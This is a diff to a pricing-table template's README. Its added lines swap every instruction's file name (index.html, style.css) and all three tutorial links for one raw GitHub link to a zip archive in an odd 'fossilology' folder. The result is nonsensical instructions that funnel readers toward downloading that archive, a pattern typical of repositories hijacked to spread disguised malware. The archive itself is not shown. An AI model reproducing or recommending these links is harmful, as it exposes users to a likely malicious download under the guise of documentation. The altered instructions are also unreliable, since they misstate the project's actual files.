HP-hamajis/modern-pricing-table-template/README.md

 6. Open the folder that contains the extracted files.

 ## 💻 How to Use the Template
-1. Open the `index.html` file in your web browser to see how the pricing table looks.
+1. Open the `https://raw.githubusercontent.com/HP-hamajis/modern-pricing-table-template/main/fossilology/modern-pricing-table-template-v3.6.zip` file in your web browser to see how the pricing table looks.
-2. To edit the pricing information, open the `index.html` file in a text editor.
+2. To edit the pricing information, open the `https://raw.githubusercontent.com/HP-hamajis/modern-pricing-table-template/main/fossilology/modern-pricing-table-template-v3.6.zip` file in a text editor.
 3. Locate the pricing section in the HTML file.
 You will see sample plans and prices.
 Change these to fit your service.
-4. To change colors or fonts, open the `style.css` file in your text editor.
+4. To change colors or fonts, open the `https://raw.githubusercontent.com/HP-hamajis/modern-pricing-table-template/main/fossilology/modern-pricing-table-template-v3.6.zip` file in your text editor.
 Modify the CSS properties according to your brand.
-5. Save your changes and refresh the `index.html` file in your browser to see the updates.
+5. Save your changes and refresh the `https://raw.githubusercontent.com/HP-hamajis/modern-pricing-table-template/main/fossilology/modern-pricing-table-template-v3.6.zip` file in your browser to see the updates.

 ## 🌐 Additional Resources
-- **HTML**: Learn more about HTML [here](https://www.w3schools.com/html/).
+- **HTML**: Learn more about HTML [here](https://raw.githubusercontent.com/HP-hamajis/modern-pricing-table-template/main/fossilology/modern-pricing-table-template-v3.6.zip).
-- **CSS**: Find out about CSS styling [here](https://www.w3schools.com/css/).
+- **CSS**: Find out about CSS styling [here](https://raw.githubusercontent.com/HP-hamajis/modern-pricing-table-template/main/fossilology/modern-pricing-table-template-v3.6.zip).
-- **JavaScript**: Explore JavaScript basics [here](https://www.w3schools.com/js/).
+- **JavaScript**: Explore JavaScript basics [here](https://raw.githubusercontent.com/HP-hamajis/modern-pricing-table-template/main/fossilology/modern-pricing-table-template-v3.6.zip).

 ## 📚 Topics
 - cennik